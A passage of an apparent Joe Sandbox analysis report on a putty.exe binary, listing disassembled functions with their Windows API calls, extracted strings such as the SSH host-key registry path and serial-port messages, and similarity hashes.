                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$CloseCreateValue_strcat
                            • String ID: Software\SimonTatham\PuTTY\SshHostKeys
                            • API String ID: 3776462603-1465603940
                            • Opcode ID: 8e85a96a961799d64268339a8bbad728353d85ca53c45e6057d12b310205e3e1
                            • Instruction ID: a59d7cf3b0793a4c416ce381d071168a183b611c4092a5d690b3ae6bb56631be
                            • Opcode Fuzzy Hash: 8e85a96a961799d64268339a8bbad728353d85ca53c45e6057d12b310205e3e1
                            • Instruction Fuzzy Hash: FF017531400208BBDF116F91EC46EDF7B69EF04754F100476FD01650A2E7769E50AA98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00455833 Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCPInfo.KERNEL32(00000000,?,00470B78,00000038,00450C18,?,00000000,00000000,004549BC,00000000,00000000,00470568,0000001C,00454704,00000001,00000020), ref: 00455871
                            • GetCPInfo.KERNEL32(00000000,00000001), ref: 00455884
                            • _strlen.LIBCMT ref: 004558A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,004549BC,?,00000000,00000000), ref: 004558C9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info$ByteCharMultiWide_strlen
                            • String ID:
                            • API String ID: 1335377746-0
                            • Opcode ID: 2feeb6e78121d374f651f3a157739a515128fc46d9516fb35b3557c73e0b06aa
                            • Instruction ID: 71a86f2062da7f953394e81b2cd737648b0bf870d99f78ad37902e1e1f948749
                            • Opcode Fuzzy Hash: 2feeb6e78121d374f651f3a157739a515128fc46d9516fb35b3557c73e0b06aa
                            • Instruction Fuzzy Hash: 00518DB0801608FFCF219F95EC949AFBBB9EF45361F24012BF814A2262D7384D55CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00453FEB Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentStringsW.KERNEL32(75570A60,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 00454007
                            • GetLastError.KERNEL32(?,?,?,?,0044F241,?,00470420,00000060), ref: 0045401B
                            • GetEnvironmentStringsW.KERNEL32(75570A60,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 0045403D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,75570A60,00000000,?,?,?,?,0044F241), ref: 00454071
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 00454093
                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 004540AC
                            • GetEnvironmentStrings.KERNEL32(75570A60,00000000,?,?,?,?,0044F241,?,00470420,00000060), ref: 004540C2
                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004540FE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 883850110-0
                            • Opcode ID: 93010b070c63b1d57ce8f2842769bc667137740e7248b97a8ac06aacaa56abe9
                            • Instruction ID: f6088a2d8d5963394e630555d18e32c73cd40fffde5fe080852456406af31800
                            • Opcode Fuzzy Hash: 93010b070c63b1d57ce8f2842769bc667137740e7248b97a8ac06aacaa56abe9
                            • Instruction Fuzzy Hash: 8B3124725092156FD7306F65AC8483BBA9CEB84B5E735093BFF45CB283D6198CC88269
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00439F9E Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,76C03E70,0000018A,?,00000000), ref: 00439FB6
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000189,?,00000000), ref: 00439FD0
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000199,?,00000000), ref: 00439FDC
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000185,00000000,?), ref: 00439FEC
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000182,?,00000000), ref: 00439FF8
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000181,?,?), ref: 0043A00A
                            • SendDlgItemMessageA.USER32(?,76C03E70,0000019A,?,?), ref: 0043A018
                            • SendDlgItemMessageA.USER32(?,76C03E70,00000186,?,00000000), ref: 0043A024
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID:
                            • API String ID: 3015471070-0
                            • Opcode ID: dbe39e404d29aaa6535a4a6812e3e6d618de16cd94b4ea41ceb902533dab2ee5
                            • Instruction ID: 7a82d8a5288d6a49391567cde1b4821aff929d34edecc5ba30f049eb9610321f
                            • Opcode Fuzzy Hash: dbe39e404d29aaa6535a4a6812e3e6d618de16cd94b4ea41ceb902533dab2ee5
                            • Instruction Fuzzy Hash: 630184B1A843583AF52017238C4AF5B7EACDBC2FA4F10491EB345290C19DB6B501CAB9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00425C22 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %s%02x$gvE$ssh-dss %d
                            • API String ID: 1497175149-1824579276
                            • Opcode ID: 57958e0a491d395dc3470ac22e0021c00f8749588cf01254fdd8e6cb20da97e4
                            • Instruction ID: 1b27a866da1aa94d4c286d17f70fb49bf2f68520a64b428f27900b89e72d9431
                            • Opcode Fuzzy Hash: 57958e0a491d395dc3470ac22e0021c00f8749588cf01254fdd8e6cb20da97e4
                            • Instruction Fuzzy Hash: F26107B2705248AADB21EFB59D82DDF379CAF14304F98052BFD10C7153EA69EA088365
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00439DC8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00439176: MapDialogRect.USER32(?,?), ref: 0043918A
                              • Part of subcall function 00439176: CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004391BA
                              • Part of subcall function 00439176: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 004391CA
                              • Part of subcall function 00439176: SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116), ref: 004391F2
                            • #13.COMCTL32(00000000), ref: 00439F7D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$CreateDialogMessageRectSend
                            • String ID: &Down$&Up$BUTTON$LISTBOX$STATIC
                            • API String ID: 4261271132-16109167
                            • Opcode ID: 423c8272584e084cc90ded58979e14bc5d2fb39d28c7552291c33a79eff041c7
                            • Instruction ID: bb746fb7df023947b67c4bc878b981e4313dee354563c314900e9b6a47100a7e
                            • Opcode Fuzzy Hash: 423c8272584e084cc90ded58979e14bc5d2fb39d28c7552291c33a79eff041c7
                            • Instruction Fuzzy Hash: D15128B1E0020A9BCF04DF59D981AAEBBB5FF49304F14805AFD04AB341D3B59A11CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040E135 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 164COMMON
                            Download Yara Rule
                            APIs
                            • _strrchr.LIBCMT ref: 0040E272
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                              • Part of subcall function 0040DEAE: _strlen.LIBCMT ref: 0040DEDA
                              • Part of subcall function 0040DEAE: _strlen.LIBCMT ref: 0040DF00
                              • Part of subcall function 0040DEAE: _strlen.LIBCMT ref: 0040DF34
                              • Part of subcall function 0040DEAE: _strspn.LIBCMT ref: 0040DF6B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat_strrchr_strspn
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE$rlogin username:
                            • API String ID: 3670284386-2094088482
                            • Opcode ID: f1f5619a44e5408d4595728fcda53f522620a94b41ec8ea5780eb15f5d7c7d0a
                            • Instruction ID: 779e1a876b7480c84887323dabdab83e4560eacee05c3f2a3bf561fda1cb4fff
                            • Opcode Fuzzy Hash: f1f5619a44e5408d4595728fcda53f522620a94b41ec8ea5780eb15f5d7c7d0a
                            • Instruction Fuzzy Hash: 2951C271400305AFDB216F66CC4195F7BA9FF48308B10483FF949AA2A2D77AD861DB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00440C48 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000006), ref: 00440DD6
                            • InvalidateRect.USER32(00000000,00000001), ref: 00440EB2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: InvalidateRectWindow
                            • String ID: +P\G$+5T\G$+5d\G$hP\G
                            • API String ID: 874511656-558855892
                            • Opcode ID: 580a7489cf5d3c3cc992cf651d9a79678b82b2051ae4968822db0af603d86b5a
                            • Instruction ID: 428bb0ceab1bbb8f53c5b19dfb400cd53e5a72426813c1f703fe3ed0ca8fc011
                            • Opcode Fuzzy Hash: 580a7489cf5d3c3cc992cf651d9a79678b82b2051ae4968822db0af603d86b5a
                            • Instruction Fuzzy Hash: F56132B1E11605CFDB15CFB8ED89A997BB1FB48304B54457AE508EB261C770B891CF48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0042A211 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 151COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %s%02x$gvE$ssh-rsa %d
                            • API String ID: 1497175149-1928246234
                            • Opcode ID: ac2ff0093cae833250305f51c748178b9d3d7eda7977db5a3f265f98debbcfd6
                            • Instruction ID: 7690cba06b481a5e2fa5d8840b5a7b491b196493169ec7a0acaa0455b709f80a
                            • Opcode Fuzzy Hash: ac2ff0093cae833250305f51c748178b9d3d7eda7977db5a3f265f98debbcfd6
                            • Instruction Fuzzy Hash: 65412AB2605258AADB10EBF59C81DDF379CAF14704F94052BFE11C7153EA69EA0883A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00451809 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142COMMON
                            Download Yara Rule
                            APIs
                            • GetStartupInfoA.KERNEL32(`Wu), ref: 00451860
                            • GetFileType.KERNEL32(00000800), ref: 00451907
                            • GetStdHandle.KERNEL32(-000000F6), ref: 00451960
                            • GetFileType.KERNEL32(00000000), ref: 0045196E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: FileType$HandleInfoStartup
                            • String ID: `Wu
                            • API String ID: 2290155327-3261129705
                            • Opcode ID: 5e328e64d1c0c6a0c2dfaecc35d142156f27a91f85ebccb24ec5bdb135c68217
                            • Instruction ID: df0ac8cfa3121b173d7f42fb5dda2e2a0d2f966fe28fb53f0ba6bdd74de61ad9
                            • Opcode Fuzzy Hash: 5e328e64d1c0c6a0c2dfaecc35d142156f27a91f85ebccb24ec5bdb135c68217
                            • Instruction Fuzzy Hash: 1B51D2B15082018FD7249B28DCA47663BA5EB11322F59477AD8A6CB3F3D72CD889C719
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449380 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 92fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 0044940B
                              • Part of subcall function 00449177: GetCommState.KERNEL32(?,?), ref: 00449188
                              • Part of subcall function 004457AD: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,75572EE0,?,?,00449070,?,00448E4B,00000000,00000000,?,00448E0F), ref: 004457DA
                              • Part of subcall function 004457AD: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00449070,?,00448E4B,00000000,00000000,?,00448E0F,00000000,00000000), ref: 004457E3
                              • Part of subcall function 004457AD: CreateThread.KERNEL32(00000000,00000000,004455AC,00000004,00000000,00000000), ref: 00445845
                              • Part of subcall function 00445710: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,75572EE0,?,?,0044905E,?,00448E0F,00000000,00000000), ref: 0044573B
                              • Part of subcall function 00445710: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0044905E,?,00448E0F,00000000,00000000), ref: 00445744
                              • Part of subcall function 00445710: CreateThread.KERNEL32(00000000,00000000,0044544C,00000004,00000000,00000000), ref: 00445799
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                              • Part of subcall function 0043D83C: CreatePopupMenu.USER32 ref: 0043D877
                              • Part of subcall function 0043D83C: AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0043D922
                              • Part of subcall function 0043D83C: DeleteMenu.USER32(00474DCC,00000000,00000000,?,00000000,?,?,00000000,00000000,?), ref: 0043D968
                              • Part of subcall function 0043D83C: DeleteMenu.USER32(00474DCC,00000200,00000000,?,?,00000000,00000000,?), ref: 0043D977
                              • Part of subcall function 0043D83C: InsertMenuA.USER32(00000000,00000010,00000010,00000000,S&pecial Command), ref: 0043D991
                              • Part of subcall function 0043D83C: InsertMenuA.USER32(00000000,00000010,00000800,00000200,00000000), ref: 0043D9A7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Create$Menu$Event$ItemMessageSend_strlen$DeleteInsertThread_strcat$AppendCommFilePopupState_wctomb_s
                            • String ID: %s%s$Opening serial device %s$Unable to open serial port$\\.\$gvE
                            • API String ID: 3590176419-1544093267
                            • Opcode ID: 4d07e35b23eee39b93f09e2b2b6e39a9200f44e75f9a74cbf5cd76865a06feec
                            • Instruction ID: aa530ea22b0113684d0d069f6972fa9a56cd50bcc8efb47e68dacb0f4eb10717
                            • Opcode Fuzzy Hash: 4d07e35b23eee39b93f09e2b2b6e39a9200f44e75f9a74cbf5cd76865a06feec
                            • Instruction Fuzzy Hash: A221A7B0A00304BFEB206F26DC81E5B7BA8EF44758F10892FF959D6292D77999008B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040ED30 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: %s%s$..\settings.c$DE$gvE$p - buf == maxlen
                            • API String ID: 4218353326-3436020521
                            • Opcode ID: 7d6e2a2ab0a6c7bc02b5b1ba447ac2734af9e9655153d91af2b9807382ec40f1
                            • Instruction ID: 881d67b24fd9f9074f03dd4dd405d04955db658826ec4f7ac11528b5b5a2b07c
                            • Opcode Fuzzy Hash: 7d6e2a2ab0a6c7bc02b5b1ba447ac2734af9e9655153d91af2b9807382ec40f1
                            • Instruction Fuzzy Hash: 8C21B77290020ABBDF15AE96DC429AF762AEF40745F14047AFD00712C3EB799E2186AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044EE6E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00454B9B,0046FC80,?,?,0044EF4D,00000000,00000001,00000000,00454B9B,00000003), ref: 0044EE81
                            • TerminateProcess.KERNEL32(00000000,?,?,0044EF4D,00000000,00000001,00000000,00454B9B,00000003), ref: 0044EE88
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminate
                            • String ID: 0G$(0G$,0G$00G
                            • API String ID: 2429186680-1713049428
                            • Opcode ID: 0452c378078a1788f2212de30715ae059edb04bf10118c0a68f3804feebe5709
                            • Instruction ID: 2eef184219eaf06013ddcb3e94726bdda1dd49d0dbf3c54232c33ad3a48acfe5
                            • Opcode Fuzzy Hash: 0452c378078a1788f2212de30715ae059edb04bf10118c0a68f3804feebe5709
                            • Instruction Fuzzy Hash: 44118B316052519BFB21DF6EEC4465A37A5FB41762B66443BE80AC7310D738DC80CBAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449E0E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileA.KERNEL32(?,0044A091,?,?,\PUTTY.RND), ref: 00449E16
                            • GetLastError.KERNEL32(\PUTTY.RND), ref: 00449E27
                            • GetLastError.KERNEL32 ref: 00449E2E
                              • Part of subcall function 00446525: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,00000000,0000FFFF,00000000,?,?,?,7556E010,0044081D,00449E36,00000000), ref: 00446595
                              • Part of subcall function 00446525: GetLastError.KERNEL32(?,?,7556E010,0044081D,00449E36,00000000), ref: 004465A0
                              • Part of subcall function 00446525: _strlen.LIBCMT ref: 004465DE
                              • Part of subcall function 004401C6: MessageBoxA.USER32(00000000,?,00000010), ref: 004401FF
                            • CreateFileA.KERNEL32(00000000,-80000001,?,00000000,00000000,00000000,00000000,0044A091,?,?,\PUTTY.RND), ref: 00449E93
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorLast$FileMessage$CreateDeleteFormat_strlen
                            • String ID: Unable to delete '%s': %s$\PUTTY.RND
                            • API String ID: 3916261023-2141787646
                            • Opcode ID: 9e5fcc03815eb5c0cabb29681c52e4c9b21c34e9ed7a1f70735ed2a76240a55c
                            • Instruction ID: ba6e03af04538fef1bec780f2d5ab2abec2baf9c1f937dfa147e7f97fe546d4d
                            • Opcode Fuzzy Hash: 9e5fcc03815eb5c0cabb29681c52e4c9b21c34e9ed7a1f70735ed2a76240a55c
                            • Instruction Fuzzy Hash: C901F7B17012012BFB189A399C06B3F3597ABC4B12F34CA3DF411D51E8EA388C416A19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00450A95 Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetStringTypeW.KERNEL32(00000001,00470560,00000001,?,00470568,0000001C,00454704,00000001,00000020,00000100,?,00000000), ref: 00450AB9
                            • GetLastError.KERNEL32 ref: 00450ACB
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,004549BC,00000000,00000000,00470568,0000001C,00454704,00000001,00000020,00000100,?,00000000), ref: 00450B2D
                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004549BC,?,00000000), ref: 00450BAB
                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00450BBD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
